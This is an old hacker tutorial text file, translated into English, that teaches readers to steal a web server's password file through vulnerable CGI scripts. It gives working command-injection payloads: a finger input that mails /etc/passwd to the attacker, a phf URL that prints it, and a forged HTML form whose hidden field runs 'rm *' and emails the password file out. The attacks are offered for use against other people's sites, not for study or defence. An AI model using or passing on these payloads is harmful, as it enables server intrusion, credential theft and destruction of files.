
            Hack from a innocente browser - by wilhelm
                translated to english by woody^drn

I'll write how to get the famous .passwd file direct from your browser.
Many people thinks positive about a browser, but actually the browser
(yer just laugh) is one of windows most dangerous weapons.

Lets take a simple security program like WinU, where you can set what
the different users can have access to. But if the user has access to
a browser, you can save the time it takes to install WinU. Everybody
knows the little trick "file://c:\" in the addres box, and can see the
root of c:.

Well lets get to the good stuff ...

There is many ways to get the passwd file, I'll describe 3 ways to get
it, where you use "phf" and "finger" as a security hole.

We should find a domain that has the program "phf" .. this aint my job
so I'll just write some random urls ...

1.  Hack with "finger" - ("finger" doesn't have to be on the client
    machine!!)

Lets say we're getting the .passwd file from http://www.forum.dk, lets
check if they've got "finger" installed.

http://www.forum.dk/cgi-bin/finger <- the file is allways in the cgi
directory, but the cgi dir can vary from server to server.

If "finger" is active, it displays a box where you can write the
username you're searching for. If this is the case you've got a BIG
chance to get the .passwd file. Now you should find a username, you can
get this by searching through some emails like karl@forum.dk where the
username is karl. Now write in the "finger" box:

karl@forum.dk ; /bin/mail your@email.com < etc/passwd

You will now be send a mail from the user (karl) where the .passwd
file is attached, and ready to be cracked. nice huh? :)

2.  Hack with "phf" - ("phf" doesn't have to be on the client machine!!)

You can actually run every single UN!X command direct through the
browser. so if you just have a little expierience with un!x, you can
guess what to write:

http://www.forum.dk/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.

This smart command will show the .passwd file direct in the browser
window, ready to be copyed and pasted and cracked...

3.  hack with sendmail etc.

Lets say we saw a site with the following data:

<form action = "http://www.forum.dk/cgi-bin/sendmail.pl" method="get">
  <input type="hidden" name="e-mail" value="support@forum.dk">
  <input type="text" name="input">
  <input type="submit" value="send">
</form>

This is easy to tamper with :), make the following site:

<html>
<head>
  <title>CGI-Hack</title>
<body>
  <form action = "http://www.forum.dk/cgi-bin/sendmail.pl" method="get">
    <input type="hidden" name="e-mail" value=" ; rm * ;mail -s file
     your@email.dk < /etc/passwd;">
    <input type="text" name="input">
    <input type="submit" value=:"Go Get IT!">
  </form>
</body>
</html>

If you're confused, the semicolons is used to seperate un!x commands.
All the form does is to send a command to the program pearl, and pearl
will send you the .passwd file to your email :o)

That's all folkes!

(.) (.)
 ) . (
(  Y  ) ...ups

-wilhelm^drn

